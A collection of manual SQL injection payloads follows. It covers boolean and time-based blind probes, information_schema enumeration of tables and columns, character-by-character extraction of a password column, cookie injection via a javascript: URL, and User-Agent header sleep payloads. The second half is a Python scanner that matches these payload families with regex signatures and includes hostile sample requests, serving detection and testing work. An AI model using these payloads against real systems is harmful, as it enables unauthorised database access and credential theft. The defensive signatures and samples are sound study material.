Collection of manual SQL injection payloads
For self-checking during manual verification. These payloads are not the only options; adjust them as needed (combine with the database name, table name, bypass methods, etc.).
Blind injection (boolean-based, time-based)
Boolean-based: look at what the page returns; time-based: look at how long the page takes to respond.
- Boolean-based check
and if(1=1,sleep(5),0)#
- Time-based check
and if(1=2,sleep(5),0)#
Blind injection payloads (for time-based, just add sleep() or a similar function)
- Get the length of the database name
1' and (length(database()))>5#
- Get the database name
1' and (ascii(substr(database(),n,1)))>97#
- Get the number of tables
1' and (select count(*) from information_schema.tables where table_schema=database())>5#
- Get the table name length
1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5#
- Get the table name
1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100#
- Get the number of columns
1' and (select count(*) from information_schema.columns where table_name='user')>5#
- Get the column name length
1' and (select length(column_name) from information_schema.columns where table_name='user' limit 0,1)>5#
- Get the column name
1' and (ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1)))>100#
- Get data
1' and (ascii(substr((select password from users limit 0,1),1,1)))=68#
Cookie injection
Used when GET-type injection is filtered
- Testing for cookie injection
javascript:alert(document.cookie="id="+escape("123 and 1=1"));
- Specific cookie injection payloads
See the blind injection payloads
User-Agent injection
HTTP header injection
- Testing for user-agent injection
(select (sleep(5))))#
- Data-guessing payload
(select sleep(5) from user where substring(user,1,1)='a'))#
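From the defender's side, the payload families above (sleep() timing probes, information_schema enumeration, ascii(substr()) extraction, length() probes) leave recognisable traces in every channel this page covers: the query string, the Cookie header and the User-Agent header. The following scanner is an added example, not part of the original collection; the request dictionaries and the SIGNATURES table are constructed for illustration, and it URL-decodes twice so that escape()-encoded cookie values are matched too.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload families listed on this page (constructed for this example).
SIGNATURES = {
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "char_extract": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.I),
    "length_probe": re.compile(
        r"\blength\s*\(\s*(database\(\)|table_name|column_name)", re.I),
}

def normalize(value: str) -> str:
    """URL-decode twice (covers escape()-style double encoding) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)

def scan_request(request: dict) -> list:
    """Scan query string, Cookie and User-Agent of one request.

    Returns a list of (channel, signature_name) tuples, one per match.
    """
    channels = {
        "query": request.get("query", ""),
        "cookie": request.get("cookie", ""),
        "user_agent": request.get("user_agent", ""),
    }
    findings = []
    for channel, raw in channels.items():
        text = normalize(raw)
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                findings.append((channel, name))
    return findings

# Constructed sample requests, one per channel discussed on the page plus a benign one.
SAMPLE_REQUESTS = [
    {"query": "id=1%27+and+%28length%28database%28%29%29%29%3E5%23",
     "cookie": "", "user_agent": "Mozilla/5.0"},
    {"query": "id=1", "cookie": "id=123%20and%20if(1%3D2%2Csleep(5)%2C0)%23",
     "user_agent": "Mozilla/5.0"},
    {"query": "id=1", "cookie": "",
     "user_agent": "(select sleep(5) from user where substring(user,1,1)='a'))#"},
    {"query": "id=42&page=2", "cookie": "session=abc", "user_agent": "Mozilla/5.0"},
]

def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Scan every sample request; benign traffic yields an empty finding list."""
    return [scan_request(r) for r in requests]
```

Note that a single signature hit is a trigger for review, not proof of exploitation; correlate with response times (for the sleep() family) and with the parameterised-query status of the endpoint.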